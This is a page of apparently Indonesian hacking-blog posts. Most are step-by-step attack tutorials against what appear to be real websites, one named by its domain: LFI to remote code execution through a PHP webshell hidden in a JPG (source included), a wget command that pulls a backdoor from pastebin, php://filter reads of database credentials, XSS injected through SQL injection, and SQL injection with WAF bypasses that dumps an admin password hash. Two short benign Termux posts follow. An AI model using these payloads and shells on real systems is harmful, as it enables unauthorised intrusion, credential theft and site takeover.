HEADLINE NEWS

LFI To RCE Using Malicious Image Upload - POST

By On 12:09:00 AM


Hai, Apa kabar?

Tentunya dengan LFI? Disini kita tidak cuma bisa melakukan file include yang ada pada system target aja. Nah, selain itu kita juga bisa melakukan perintah yakni misal di server linux melalui vulnerability itu sendiri dengan memanfaatkan metode seperti php wrapper dan lain sebagainya. 

Dan yang kita bahas kali ini adalah mengenai LFI To RCE melalui gambar yang mana gambar tersebut sudah di inject atau disisipkan sebuah script php kode.

Tutorial LFI to RCE

Oiya, buat yang belum tau cara inject script php ke gambar, bisa kamu baca pada artikel berikut.


Disitu nanti sudah tertulis dengan jelas kok step by stepnya, oke.

Tutorial LFI To RCE Using Malicious Image Upload - POST

Cerita dikit boleh ya, sebenarnya ini challenge dari grup, dan disitu aturan mainnya disuruh buat pentest website tersebut lalu upload file berbentuk txt pada directory home website tersebut, kurang lebih seperti itu deskripsinya.

Lanjut...

Nah, sekarang hal pertama yang saya lakukan adalah Recon, kira-kira website tersebut mempunyai celah apa sih? Setelah cari-mencari akhirnya saya menemukan url yang kelihatan unik dan berbeda dari yang umumnya.

Contoh URL:
http://domain/index.php?file=about_us.php&&page=Contact Us

Jadi sudah ketemu, tanpa berpikir terlalu lama saya langsung mencoba dengan Local File Inclusion. Kemudian tambahkan /etc/passwd dibelakang file= ,setelah itu baru saya jalankan dan hasilnya malah kena WAF FORBIDDEN.

It's oke tidak apa-apa, sekarang lakukan bypass dengan menambahkan double slash // jadinya seperti ini //etc//passwd ,lalu jalankan.

Tutorial LFI To RCE

Waf pun berhasil di bypass, sip!

Tapi ya, singkat cerita disini saya tidak bisa membaca /proc/self/environ entah bagaimana saya tidak mengerti juga tiba-tiba web tersebut terjadi kesalahan semacam server error gitu. Untuk hal ini pun saya SKIP aja.

Setelah dengan LFI tadi gagal, disini saya berpikir apakah bisa di SQL Injection? Lalu saya pun mencobanya, dan hasilnya...

Tutorial LFI To RCE

Yoloo, benar saja web tersebut mempunyai celah SQL Injection, oke menarik.

Tidak ingin menjelaskan terlalu panjang karena untuk mempersingkat waktu, dan singkat cerita disini dengan teknik sql injection yang terdapat pada web tersebut, saya berhasil mendapatkan username dan password untuk login, tentunya setelah melalui beberapa proses umumnya sqli.

Tutorial LFI To RCE


Oke-oke, sekarang tinggal bagaimana cara mencari admin login pada website tersebut, tapi sebelumnya saya sudah tahu tempat admin login website tersebut berada. Dikarenakan sudah saya scan pake tool Admin Finder.

Kemudian saya login...

LFI To RCE

Dan boom saya berhasil masuk pada dashboard admin panel website tersebut dengan menggunakan username dan password tadi yang saya dapatkan dari celah sql injection.

Selanjutnya, apa yang harus saya lakukan?
Oiii,,, upload shell backdoor lah bro, oh iya ya.
Ingat? Kan di challenge tersebut tantanggannya adalah untuk bisa upload file txt pada home directory nya, oke shap.

Sekarang cari tempat from upload...

Setelah menemukan from upload gambar, barulah saya mencoba untuk upload file shell backdoor dengan ektensi .php, tapi sayang website tersebut memberikan sebuah pesan error "Unknown extension. Only JPG/JPEG/ files are allowed" berarti selain JPG/JPEG file lain tidak diperbolehkan.

Tutorial LFI To RCE

Sudah di bypass shell backdoornya? Sudah, tapi hasilnya ya tetap sama aja unknown extension. Kalau tamper data? Gak tahu! Lha wong saya make Hp Android wkwk.

Sebentar ngopi-ngopi dulu dan mencari ide.

Nah oke lanjut, untuk cara mengatasi tidak bisa upload shell tadi adalah kita akali dengan meng-upload shell.jpg yang sebelumnya shell.jpg tersebut sudah saya sisipkan script php code.

Cara inject script php di gambar gimana? Kan tadi saya sudah sertakan bacaan pada bagian awal, kalau lupa coba scroll ke atas lagi.


Eksekusi LFI To RCE Melalui Malicious Image

Sesudah berhasil upload shell.jpg sekarang tinggal mencari dimana letak shell.jpg tadi terupload.

Setelah mencari, disini saya mendapatkan path letak dimana file shell.jpg tersebut disimpan, kurang lebih seperti ini jelasnya.

Tutorial LFI To RCE

Lalu bagaimana cara mengeksekusi shell tersebut?

Perhatikan baik-baik, cara mengeksekusi shell.jpg tersebut dengan cara seperti ini, kita hanya tinggal include file tersebut melalui celah tadi yaitu Local File Inclusion, kira-kira seperti berikut ini contoh biar tidak bingung.

http://domain/index.php?file=adhoc_staffs/5_umaru.jpg

Kira-kira kalau di jalankan tampilan website tersebut akan seperti berikut ini.

Tutorial LFI To RCE

Lalu bagaimana cara menggunakan shell umaru.jpg tersebut?

Jadi sebelumnya, pada saat saya melakukan inject script php pada gambar umaru.jpg tersebut, saya sudah menyisipkan script php seperti berikut ini.

Script PHP:
<style>body{font-size: 0;}h1{font-size: 12px}</style><h1> <?php if(isset($_REQUEST['umaru'])){system($_REQUEST['umaru']);}else{echo '<img src="LINK GAMBAR" border=0> ';}__halt_compiler();?></h1>

Jadi kalau kita pahami, cara mengeksekusi command payload shell tersebut dengan menambahkan &umaru=  dibelakang .jpg

Kalau digabukan menjadi seperti ini,

http://domain/index.php?file=adhoc_staffs/5_umaru.jpg&umaru=(command)

Paham kan? Yasudah.

Oke sebagai contoh, saya ingin menjalankan command id, jadi kurang lebih seperti ini perintahnya.

http://domain/index.php?file=adhoc_staffs/5_umaru.jpg&umaru=id

Tutorial LFI To RCE

Bisa lihat pada gambar tersebut, command id tersebut berhasil dieksekusi. Selebihnya tinggal kalian exploitasi sendiri dengan command-command yang lain seperti whoami, ls -la, dan lain sebagainya.


Balik lagi ke tujuan awal tadi, berhubung challenge nya disuruh untuk upload file text di home directory website tersebut, saya akan menyelesaikan tantangan tersebut.

Berikut caranya, yang saya lakukan pertama upload shell backdoor dulu baru lagi upload file txt.

Command Untuk Upload Shell Backdoor

http://domain/index.php?file=adhoc_staffs/5_umaru.jpg&umaru=wget https://pastebin.com/raw/qp6SzDT0 -O kalioujny.php

Tutorial LFI To RCE

Setelah saya jalankan malah forbidden. Oke sekarang kita coba ulangi lagi tapi kali ini dengan menggunakan metode POST DATA.

Disini saya menggunakan Anon Hackbar untuk melakukan post data.
Kira-kira seperti ini caranya melakukan POST DATA pada Anon Hackbar.

URL
http://www.ascollegebikramganj.org/index.php?file=adhoc_staffs/5_umaru.jpg

POST DATA
umaru=wget  https://pastebin.com/raw/qp6SzDT0 -O kalioujny.php

Tutorial LFI To RCE - POST DATA

Setelah itu klik EXECUTE pada tombol tersebut.

Nah, untuk mengetahui shell backdoor tersebut sudah ter upload atau belum, mari kita cek. Terus cara akses shellnya gimana? Caranaya seperti ini http://namaweb/namashellkalian.php

Berikut ini ketika saya berhasil upload shell pada website tersebut,

Tutorial LFI To RCE

Jadi ya tinggal upload file txt sesuai permainan...

Tutorial LFI To RCE

Baiklah oke, berarti saya sudah berhasil melakukan challenge tersebut, kurang lebih prosesnya seperti apa yang saya tulis tersebut.

Challenge selesai...

Disini saya bukan sok pro, tapi lebih ke berbagi pengalaman aja. Suka ya makasih tidak suka ya tidak apa-apa, tanggapan orang kan berbeda-beda.

Akhirnya selesai, ya semoga bermanfaat buat teman-teman semua dan mohon maaf apabila ada yang kurang jelas entah itu penyampain atau bahkan kesalahan dalam penulisan, mohon dimaklumi ya.

Selamat berpuasa bagi yang menjalankan puasa #Ramadhan2020 dan yang tidak puasa ya tidak apa-apa, eh mending kita ngopi yuk wkwk.

Sekian dan terimakasih. Matursuwun!.

Tutorial Local File Inclusion php://filter Base64

By On 12:01:00 AM


Hallo, apa kabar?

Melalui artikel kali ini, saya ingin sharing mengenai cara melihat isi source file code  website target yang mempunyai rentan terhadap LFI dengan menggunkan payload atau metode php://filter.

lfi php filter base64

INFO: Sebenarnya ini challenge dari sebuah grup, yaudah saya penasaran lalu saya coba. Oke skip,  mari kita lanjut aja.

Buat yang sudah mengerti tentang LFI, monggo kalian lewati aja. Nah buat yang belum tahu, LFI adalah singkatan dari Local File Inclusion Lalu maksudnya apa? Yakni akses yang tidak sah ke file yang ada di sistem. Celah ini memungkinkan seorang penyerang bisa mendapatkan akses ke file sensitif di server.

Jika masih belum paham, coba googling dulu hehe.

Tutorial Local File Inclusion php://filter

Contoh target challenge: http://url.com

Kira-kira website target tersebut ada celah apa? Untuk menjawab rasa penasaran saya, kemudian saya view-source pada website tersebut. Setelah cari-cari, disini saya menemukan sebuah paramater menarik seperti pada gambar bawah ini,

lfi php filter base64

Jika saya klik url tersebut akan seperti ini,

http://url.com/news/index.php?page=news.php&id=535&n_t=1

Hmm, apakah website tersebut mempunyai rentan LFI di parameter page=news.php oh atau mungkin ada celah sqli id=353 ?? Kita coba aja.

Ekploitasi Kerentanan

Sebelumnya pada challenge tersebut, saya disuruh untuk menemukan MySQL host, user, dan password.

lfi php filter base64

Nah, pertanyaan yang muncul selanjutnya adalah "apa yang harus saya lakukan dan bagaimana caranya?" Jawaban sederhananya yaitu tanpa berpikir terlalu pusing kita bisa menggunakan metode php://filter kan disitu challenge-nya LFI, sudah dipastikan ini vuln lfi, ya kan? Hahaha.

[Payload] php://filter
php://filter/convert.base64-encode/resource=

Yap benar, untuk menemukan data MySQL seperti host dll saya menggunakan teknik php://filter, jadi kira-kira seperti ini payload yang saya gunakan.

http://url.com/news/index.php?page=php://filter/convert.base64-encode/resource=index.php&id=535&n_t=1

Setelah itu saya tekan enter akan muncul enkripsi berupa base64 encode, kira-kira seperti pada gambar berikut ini.

lfi php filter base64

Selanjutnya untuk melihat hasil tersebut, saya decode code tersebut dan hasilnya seperti ini.

lfi php filter base64

CATATAN: Untuk melakukan encode/decode saya menggunakan tools ini > Website Base64 Encode/Decode Online.

Nah, sampai sini saya sudah mendapatkan source code dari include filenya, selanjutnya tinggal mencari atau explore aja.

Langkah selanjutnya mengganti file index.php dengan ../template/head.php

http://url.com/news/index.php?page=php://filter/convert.base64-encode/resource=../template/head.php&id=535&n_t=1

Kemudian jalankan, dari hasil output tersebut yang sudah saya decode seperti ini.

lfi php filter base64

Terlihat jelas disitu, file ../include/connect_inc.php artinya kita bisa melihat isi dari file database tersebut, seperti host, user, password.

Jadi sekarang kita ganti directory ../template/head.php dengan ../include/connect_inc.php kira-kira seperti ini lengkapnya.

http://url.com/news/index.php?page=php://filter/convert.base64-encode/resource=../include/connect_inc.php&id=535&n_t=1

Setelah itu saya enter, kemudian seperti biasa untuk melihat isi dari include file tersebut ke yang aslinya lakukan decode terlebih dahulu.

Dan boom, berhasil.

lfi php filter base64

Dari gambar tersebut saya berhasil menemukan MySQL host, user, dan password. Artinya saya sudah berhasil melakukan challenge tersebut.

Selesai...

Demikian artikel kali ini tentang LFI php://fillter, semoga apa yang saya tulis ini dapat bermanfaat buat semua orang. Apabila ada kesalahan kata/penjelasan saya mohon maaf.

Yasudah terimakasih, untuk semuanya.

Tutorial XSS In SQL Injection

By On 10:40:00 PM

Hallo, Apakabar?

Melalui artikel kali ini, saya ingin sharing sedikit tutorial tentang xss di sql injection, penasaran? Oke, simak aja ya hehe.

Apa itu XSS In SQL Injection?

Nah jadi, teknik ini sebenarnya tidak jauh berbeda dengan SQL Injection manual seperti biasa. Akan tetapi didalam query sql injection nanti kita masukan sebuah script xss.

Tutorial XSS in SQL Inkection

Untuk melakukan teknik seperti ini setidaknya punya basic pengetahuan tentang xss, saya rasa mungkin teman-teman semua banyak yang sudah tahu apa itu xss, jadi saya tidak perlu menulis lagi soal xss. Kalau ada yang belum tahu saran dari saya, silahkan kamu bisa googling terlebih dahulu, oke.

Baiklah, tanpa berlama-lama kita langsung ke tutorialnya saja ya, letsgoo.

Tutorial XSS In SQL Injection


INFO: Untuk bagian mengecek web tersebut vulnerable atau tidak saya skip dan untuk cara menentukan balancing atau comment saya skip juga, karena apa? Karena kamu pasti sudah mengerti. Jadi saya langsung lompat saja ke step menentukan jumlah columns.

Step 1: Menentukan Jumlah Columns


Nah, langkah selanjutnya adalah menentukan berapa jumlah kolom dari table di database yang digunakan pada website tersebut. Untuk caranya kita seperti biasa menggunakan order by dan sampai menemukan diangka berapa terdapat error.

url/rooms.php?id=1' order by 1--+ Normal
url/rooms.php?id=1' order by 5--+ Normal
url/rooms.php?id=1' order by 7--+ Normal
url/rooms.php?id=1' order by 8--+ Normal
url/rooms.php?id=1' order by 9--+ Error

Oke sip, pada target disini error muncul diangka ke 9, itu artinya kalau jumlah kolom hanya ada 8.

Step 2: Mencari Angka Ajaib


Seperti biasanya, angka ajaib atau bisa disebut juga dengan nama magic number ini bisa kita dapatkan dengan menjalankan payload union select.

Oiya, dalam hal ini kamu sesuaikan sendiri dengan jumlah table yang kamu temukan pada website target, jangan samakan dengan tulisan ini karena akan berbeda, dan ingat tambahkan tanda - dibelakang = ya.

url/rooms.php?id=-1' union select 1,2,3,4,5,6,7,8--+

Setelah saya menjalankan payload tersebut, disini output angka ajaibnya adalah 2, 3, 4.

Menentukan Angka Ajaib - SQLI

Dari angka yang kita peroleh tersebut bisa kita gunakan untuk melangkah ke tutorial berikutnya, yaitu memasukan script xss dibagian angka ajaib tadi.

Step 3: Memasukan Script XSS


Script XSS:
<script>alert("XSS")</script>

Script XSS Encode Hex:
0x3c7363726970743e616c657274282258535322293c2f7363726970743e

Nah tadi dibagian angka ajaibnya kita coba masukan script xss tersebut, seperti ini caranya.

url/rooms.php?id=-1' union select 1,2,<script>alert("XSS")</script>,4,5,6,7,8--+

Query encode,

url/rooms.php?id=-1' union select 1,2,0x3c7363726970743e616c657274282258535322293c2f7363726970743e,4,5,6,7,8--+

Setelah itu jalankan, jika muncul pop up seperti pada gambar (lihat gambar) berarti bisa dibilang kode berhasil dieksekusi.

Sqli with script xss

CATATAN: Terkadang kalau kita memasukan script kode tersebut, beberapa website tidak bisa menerima kode secara langsung, nah untuk mengakalinya kita bisa encode ke HEX terlebih dahulu.

Step 4: Menggabungkan Query SQL Injection Dengan Script XSS


Nah sekarang, tinggal bagaimana cara buat menggabungkan query sql injection dengan script xss? Jadi caranya seperti berikut ini, tinggal masukan querynya didalam kode script xss tersebut.

Query/Dios: (select(group_concat(table_name,0x3a3a,column_name)) from information_schema.columns where table_schema=database())

Sekarang kita bisa coba masukan ke dalam kode xss, jadi kurang lebih querynya akan seperti ini,

url/rooms.php?id=-1' union select 1,2,concat(<script>alert(",(select(group_concat(table_name,0x3a3a,column_name)) from information_schema.columns where table_schema=database()),")</script>),4,5,6,7,8--+

Perhatikan baik-baik ya, sebelum menjalankan kode tersebut, sekarang kita lakukan encode dibagian kode script xxs ke value hex.

<script>alert(" = 0x3c7363726970743e616c6572742822

")</script> = 0x22293c2f7363726970743e

Maka jika digabungkan jadi seperti ini,

url/rooms.php?id=-1' union select 1,2,concat(0x3c7363726970743e616c6572742822,(select(group_concat(table_name,0x3a3a,column_name)) from information_schema.columns where table_schema=database()),0x22293c2f7363726970743e),4,5,6,7,8--+

Kemudian tinggal jalankan, apabila sukses website tersebut akan menampilkan popup.

Sqli with dios di script xss popup

Yah, tampilanya kok berantakan?

Sekarang mari kita coba percantik dengan menambahkan breakrow agar supaya kelihatan lebih rapi dan tersusun.

CATATAN: Di XSS tanda breakrow seperti <br> tidak bisa digunakan, jadi alternatif lain kita bisa memakai seperti ini \n

Jadi cara menambahkan \n seperti ini ya, simak baik-baik.

url/rooms.php?id=-1' union select 1,2,concat(0x3c7363726970743e616c6572742822,(select(group_concat(\n,table_name,0x3a3a,column_name)) from information_schema.columns where table_schema=database()),0x22293c2f7363726970743e),4,5,6,7,8--+

Disitu saya menambahkan \n sebelum table_name, sekarang kita encode \n terlebih dahulu ke hex value.

\n = 0x5c6e

Jadi kalau kita gabungkan maka kurang lebih querynya akan seperti ini,

url/rooms.php?id=-1' union select 1,2,concat(0x3c7363726970743e616c6572742822,(select(group_concat(0x5c6e,table_name,0x3a3a,column_name)) from information_schema.columns where table_schema=database()),0x22293c2f7363726970743e),4,5,6,7,8--+

Kemudian jalankan, maka jika berhasil akan seperti pada tampilan berikut ini.

Sqli with popup xss

Sekarang tampilanya sudah tersusun rapi bukan?
Oke selanjutnya, kita coba print nama kita, version, database dan lain sebagainya.

Berikut ini caranya, cukup masukan kedalam querynya saja.

url/rooms.php?id=-1' union select 1,2,concat(0x3c7363726970743e616c6572742822,(select(concat(Injected By Kalioujny\n,version(),\n,user(),\n,database(),\n,(group_concat(0x5c6e,table_name,0x3a3a,column_name)))) from information_schema.columns where table_schema=database()),0x22293c2f7363726970743e),4,5,6,7,8--+

Bingung tidak? Saya akan jelaskan dibawah berikut ini jika masih binggung.

teks warna blue: query xss.
teks warna red: query tambahan contoh misalnya, version(), user(), database() dan lain sebagainya.
teks warna green: query dios.

Seperti biasa, sebelum menjalankan kita encode querynya terlebih dahulu bagian seperti nama kita, \n, tapi bagian version(), user(), database() tetap biarkan saja seperti aslinya jangan di encode.

url/rooms.php?id=-1' union select 1,2,concat(0x3c7363726970743e616c6572742822,(select(concat(0x496e6a6563746564204279204b616c696f756a6e795c6e,version(),0x5c6e,user(),0x5c6e,database(),0x5c6e,(group_concat(0x5c6e,table_name,0x3a3a,column_name)))) from information_schema.columns where table_schema=database()),0x22293c2f7363726970743e),4,5,6,7,8--+

Setelah itu tinggal kamu jalankan, jika berhasil maka tampilanya akan seperti ini,

Payload XSS SQL Injection

Kalau tidak muncul gimana? Mungkin ada kesalahan kali itu, coba teliti kembali ya.

Kebanyakan kalau gagal dalam mengeksekusi query xss ke dalam sql injection itu biasanya penyebabnya adalah penempatan koma, jadi hal ini harus benar-benar diteliti kembali ya.

Selesai...

Demikian artikel sederhana yang saya tulis ini tentang Tutorial XSS In SQL Injection, semoga dapat bermanfaat buat semua orang. Apabila ada kesalahan dalam penulisan atau penjelasan mohon dimaklumi ya hehe.

Oiya, jika ada sesuatu yang ingin ditanyakan monggo silahkan tulis dikolom komentar yang sudah disediakan ya, sebisa mungkin nanti saya akan bantu jawab, oke.

Berhubung dunia saat ini sedang ada Pandemi Virus Corona Covid-19, maka tetap #DiRumahAja jangan lupa jaga diri kalian, jaga kesehatan juga ya. Semoga dunia ini lekas membaik ❤️ amin.

Akhir kata, Maturnuwun, Terimakasih.

Tutorial SQL Injection POST Method - Anon HackBar

By On 8:04:00 PM

Hi, Apakabar?

Nah oke, pada artikel kali ini saya ingin sharing pengalaman mengenai tentang SQL Injection yaitu Tutorial SQL Injection POST Method mungkin ini bisa menjadikan sebagai referensi untuk teman-teman yang sedang membutuhkan.

Tentang SQL Injection? Ah pasti kamu sudah tahu akan mengenai hal ini tanpa harus dijelaskan di artikel ini, yakan? Hehe.

SQL Injection POST Method menggunakan Anon HackBar Android

Dari sisi metode yang digunakan, serangan dapat melalui 2 method yaitu GET dan POST, jika kamu belum paham mari kita simak sedikit penjelasan dibawah ini,

GET Method


Disebut metode GET karena menggunakan dengan parameter GET untuk memasukan/menyuntikan sebuah perintah, dan ini yang paling umum ditemui atau banyak digunakan untuk menyuntikan perintah SQL Injection dengan melalui URL sebuah situs atau website pada address bar, sehingga metode ini biasanya dikenal juga sebagai URL Based SQL Injection.

POST Method


Sedangkan POST Method ini berasal dari sebuah variabel yang ada pada sebuah form, misalnya contoh seperti pada form login, form search yang tidak dilengkapi dengan filter input. Adapun cara untuk mengetahuinya juga sama dengan memberikan perintah karakter ' petik, - minus atau bisa juga dengan karakter ASCII yang dirasa bisa menghasilkan sebuah error. Kalau hal seperti ini sering saya temui, dulu pernah iseng menggunakan metode ini untuk mem-bypass halaman login website tanpa harus mengetahui username password yang digunakan.

Oke jika dirasa sudah paham, sekarang mari kita lanjutin ke step by step berikutnya yukk.

Tutorial SQL Injection POST Method

Maaf sebelumya, disini saya tidak bisa memberikan live target yang asli dikarenakan saya takut nantinya digunakan untuk sesuatu yang bersifat destruktif, jadi anggap saja target saya kurang lebih seperti ini,

http://url.com/food.php?id=2

Step 1: Cek Target Vuln atau Tidak

Untuk memastikan vuln atau tidaknya saya menggunakan perintah tanda petik ' dan diletakan diakhir endpoint, kurang lebih jadi seperti ini.

url/food.php?id=2'

Setelah saya tekan enter, pada website tersebut muncul tampilan error yang berbeda dengan error biasanya, kurang lebih seperti pada gambar berikut ini,

SQL Ijection error syntax - Vuln

Nah setelah itu, saya mencoba untuk mengembalikan website ke tampilan semula dengan melakukan comment/balancing pada payload.

Saya menambahkan tanda double dash seperti ini -- diakhir tapi hasilnya malah kena WAF Forbidden. Sekarang saya mencoba untuk menghilangkan karakter tanda petik ' tadi, sehingga setelah saya jalankan website tersebut kembali normal, jadi cek target vuln atau tidaknya sudah selesai.

Step 2: Mencari Jumlah Table

Seperti pada umumnya, untuk mencari dan menghitung jumlah table yang ada didalam database website tersebut, kamu bisa menggunakan perintah order by sampai muncul diangka berapa terdapat error.

Tapi pada contoh target saya ini, setelah saya memasukan perintah order by malah kena WAF Forbidden, setelah memikirkan bagaimana caranya untuk bypass waf tersebut dan kemudian mencoba langkah demi langkah akhirnya saya menemukan cara yang pass untuk bypass, kurang lebih seperti ini.

Menyuntikan order by SQL Injection
Memasukan order by tapi kena waf

url/food.php?id=2 order /**_**/ by 1-- Normal
url/food.php?id=2 order /**_**/ by 7-- Normal
url/food.php?id=2 order /**_**/ by 11-- Error

Pada target ini, error muncul diangka ke 11 berarti bisa kita pahami kalau jumlah table atau kolom hanya ada sampai 10 saja.

Step 3: Mencari Angka Ajaib

Cara selanjutnya adalah mencari atau mengeluarkan angka berapa yang muncul dengan menggunakan perintah union select sampai diangka tadi yang error pada saat order by, contoh ditarget saya tadi error sampai 11 jadi union select 1 sampai angka 10.

Maka perintahnya akan seperti berikut ini, dan jangan lupa tambahkan tanda - dibelakang = agar angka ajaibnya muncul.

url/food.php?id=-2 union select 1,2,3,4,5,6,7,8,9,10--

Setelah saya jalankan, apa yang terjadi? Lagi-lagi kena WAF Forbidden, ah sialan.

Menyuntikan union select - SQL Injection
Memasukan union select tapi kena waf

Website target ini memang bikin kesal, saya diharuskan untuk berpikir untuk bagaimana cara bypass waf tersebut, oke tidak apa-apa hal ini sudah menjadi tantangan bagi penyerang jadi biasa kalau ada WAF wkwkk.

Saya sudah mulai memikirkannya dan saya mencoba bypass waf tersebut kata demi kata (union dan select), kurang lebih seperti ini caranya.

url/food.php?id=-2 /*!50000union*/ select 1,2,3,4,5,6,7,8,9,10-- Forbidden

url/food.php?id=-2 and 0 /*!50000UniON SeLeCt*/ 1,2,3,4,5,6,7,8,9,10-- Forbidden

url/food.php?id=-2 and 0 /*!50000%55niON*/ /*!50000%53eLeCt*/ 1,2,3,4,5,6,7,8,9,10-- Forbidden

url/food.php?id=-2 and mod(53, 12) union/**/distinctrow select 1,2,3,4,5,6,7,8,9,10--

Bypass WAF FORBIDDEN SQL Injection

Dari sekian bypass yang sudah saya coba terapkan, tetap saja tidak ada perubahan sama sekali alias ketika memasukan perintah tersebut masih tetap terkena WAF Forbidden.

Sebenarnya saya sudah mau bodo amat skip aja cari web yang lain masih banyak yang vuln sqli, tetapi kok rasanya masih penasaran gitu pengen solved hehe, yaudah.

CARA BYPASS DIMULAI DARI SINI :D

Entah kenapa tiba-tiba pikiran saya kek ada yang mengarahkan gitu "coba aja dengan cara POST Method" siapa tahu bisa solved, wah ada-ada saja aku ini wkwk.

Oke, disini saya mulai mencoba menerapkan cara bypass waf tersebut dengan metode POST DATA dan berhubung saya tidak ada laptop saya menggunakan aplikasi Anon HackBar yang versi 1.4 soalnya ada fitur POST DATA.

Nah, lalu bagaimana cara bypass waf dengan POST Method di Anon HackBar tersebut? Caranya seperti berikut ini,

Dicontoh saya:
url/food.php?id=-2 union select 1,2,3,4,5,6,7,8,9,10--

Kemudian post data harus on, cukup salin id=-2 union select 1,2,3,4,5,6,7,8,9,10-- saja dan tempelkan dikolom post data yang terdapat diaplikasi anon hackbar tersebut, jika kamu masih binggung bisa lihat pada contoh gambar berikut ini.

SQL Injection POST DATA - Anon HackBar

Pada target tersebut saya tambakan perintah and 0 biar muncul angka ajaibnya.
Setelah saya jalankan, lihat apa yang terjadi? Ternyata bypass waf tersebut berhasil dengan metode post data, tanpa harus union select dibuat aneh-aneh seperti contoh tadi.

SQL Injection POST DATA - Andorid

Owalah, ternyata saya sudah capek mikir gini gitu setelah diakali dengan POST DATA ternyata waf bisa bypass, bikin pusing aja haha.

Oke permasalahanya sudah selesai, website target tersebut muncul angka ajaibnya yaitu 2,4, berarti ini artinya kita bisa menggunakan salah satu dari angka tersebut untuk melanjutkan langkah berikutnya yaitu dump username dan password dengan DIOS.

Step 4: Cara Mendapatkan Username dan Password Dengan DIOS

Sebenarnya untuk cara seperti ini tidak harus menggunakan DIOS tidak jadi masalah sih, kamu bisa menggunakan cara kamu sendiri asal sudah paham dan mengerti.

Disini tujuan saya menggunakan DIOS untuk memunculkan semua table dan columns dari database website tersebut hanya dengan menggunakan 1 query, dan tentunya biar tidak terlalu ribet.

Oiya saya menggunakan DIOS By Zen dan memasukan dios tersebut diangka ke 2, setelah itu klik EXECUTE kira-kira tampilanya seperti gambar ini,

SQL Injection with DIOS By Zen

Jika sudah bisa, selanjutnya sekarang mencari username dan password website tersebut.
Pada target ini nama columnsnya admin kemudian nama-nama tablenya ada user_name dan password.

SQL Injection dump username dan password

Jika dimasukan didalam DIOS maka kurang lebih perintah lengkapnya seperti berikut,

url/food.php?id=-2 and 0 union select 1,make_set(6,@:=0x0a,(select(1)from(admin)where@:=make_set(511,@,0x3c6c693e,user_name,password)),@),3,4,5,6,7,8,9,10--

Lalu kemudian tinggal klik EXECUTE, maka hasil dari output yang saya dapatkan seperti ini.

Username: admin
Password: aa32c75df0b5b310c80323fc02d44599

Dump username dan password sukses dengan DIOS By Zen

Kalau sudah mendapatkan user/pass langkah terakhir yaitu tinggal crack password tersebut, dan itu pun kalau perlu aja.

Selesai deh...

Yah, bagaimanapun juga, SQL Injection tergantung pada skill kreativitas attacker, saya masih nub hehe.

Demikian artikel saya kali ini tentang Tutorial SQL Injection POST Method, jika ada kesalahan dari saya mohon untuk diluruskan ya. Semoga apa yang saya tulis ini dapat bermanfaat buat kalian.

Terimakasih sudah membaca.

Install Termux Path? Siapa Tahu Suka

By On 9:30:00 AM


Halo, Apa kabar?
Malem minggu tempatku hujan? Gabut? Gakpapa deh wkwkk *oposihh

Apa itu termux path

Melalui artikel kali ini, saya ingin memberikan sebuah tutorial tentang cara install aplikasi termux path sekaligus akan memberikan sedikit tips cara menggunakan termux path, kali aja masih banyak yang belum tahu tentang tools termux path app ini.

Kenalan Dengan Termux Path


Menurut opini saya, Aplikasi termux path ini akan membantumu untuk lebih efisien dalam menggunakan Termux.

Misalnya gini, saya akan ambil contoh yang sudah ada aja ya, kamu punya kode yang panjang seperti berikut ini:

git status
git add -A .
git commit -m "upload"
git push

Kesimpulanya, maka dengan aplikasi ini, kamu tidak perlu ribet menggetik sepanjang itu juga. Cukup dengan ketikan perintah yang singkat seperti "upload".

Termux Path ini, juga bisa untuk perintah singkat dengan parameter tertentu, jadi bisa dibilang lebih efisien dalam hal mengerjakan sesuatu di Termux.

Nah, jika kamu sudah paham akan hal ini bagus deh. Terus? Oiyaa, saya akan memberikan cara pengunaan termux path juga kok, penasaran caranya seperti apa? Ayoo kita lanjut...

Tips Cara Menggunakan Termux Path


Jelas cara ini sangat mudah sekali tidak perlu rooting segala untuk install app termux path ini. Tahu sendiri kan, kalo hp dimana kondisi sudah di root pasti ya garansi bakal hilang hiyaaa... *ngosakasiksuket

Dalam penggunaanya, misal saya ingin menjalankan sebuah server php di termux untuk nantinya saya bisa mengakses file di folder tersebut melalui browser. Nah, kodenya itu contohnya akan seperti ini:

cd /sdcard/YesWeLearn
php -S localhost:2020

Kemudian buka aplikasi termux path kamu.
Jika akan diterapkan, maka perintah yang saya ketikan seperti ini:

Kode Termux Path

Selanjutnya, klik tombol Olah.
Lalu, copy paste hasil kodenya dan buka Termux kamu dan tempelkan kode tadi yang sudah kamu salin.

Copy Pastekan di Termux

Sudah? Nah, kemudian untuk menjalankan servernya, ketikan "server" dan untuk mengaksesnya ketikan http://localhost:2020 di browser kamu.

Didalam folder/directory YesWeLearn yang saya sudah jalankan tadi, terdapat file minicommand.php dan lain-lain. Jadi untuk untuk akses file tersebut tambahkan saja dibelangkanya. Maka jadinya seperti ini, http://localhost:2020/minicommand.php terus tekan enter.

Akses PHP Server Termux di Browser


Yup, selesai. Gimana? Tertarik untuk mencobanya? Monggo silahkan diaplikasikan sendiri saja.

Lahh, aplikasi termux pathnya mana? Nih yang mau Download Aplikasi Termux Path kalo link rusak/error silahkan lapor ya, nanti tak perbaiki.

Oiyaa, jika kamu ada pertanyaan baik itu saran, tuliskan saja dikolom komentar yang sudah disediakan. Kalo ada waktu untuk membalas pertanyaanya, segera akan saya bantu jawab sebisa mungkin.

Demikian artikel sederhana dari saya ini, tentang Install Aplikasi Termux Path? Siapa Tahu Suka, mudah-mudahan apa yang share ini bermanfaat buat teman-teman semua ya.

Terimakasih, semoga membantu. Enjoy!

Cara Merekam Aktivitas di Termux Menggunakan Asciinema

By On 6:05:00 AM


Melalui artikel ini, saya ingin memberikan tutorial cara merekam aktivitas di termux dengan menggunakan asciinema, semoga suka.

Cara merekam aktivitas di termux menggunakan asciinema

Sebelum ke next tutorial, alangkah baiknya kalau kita memahami pengertian dari asciinema, Setuju? Oke sip...

Apa itu Asciinema?

Menurut berbagai sumber yang sudah saya rangkum, asciinema adalah tool open source untuk merekam sesi di dalam lalu kemudian membagikanya di situs atau website.

Tujuan asciinema yakni untuk menjadi wadah untuk setiap pengguna command-line yang ingin berbagi ketrampilan mereka dengan orang lain.

Yasudah langsung saja, mungkin kamu sudah penasaran kan? Cara install asciinema, cara menggunakna asciinema itu seperti apa? Oke, simak yuk penjelasan sederhana berikut ini.

Cara install Asciinema di Termux

Hey, jika kamu belum menginstall aplikasi termux saya sarankan terlebih dahulu kamu harus menginstall termux. Jika kamu menggunakan selain terminal termux, saya gak tahu tutorial ini bakalan work atau tidaknya ya.

1. pkg install asciinema

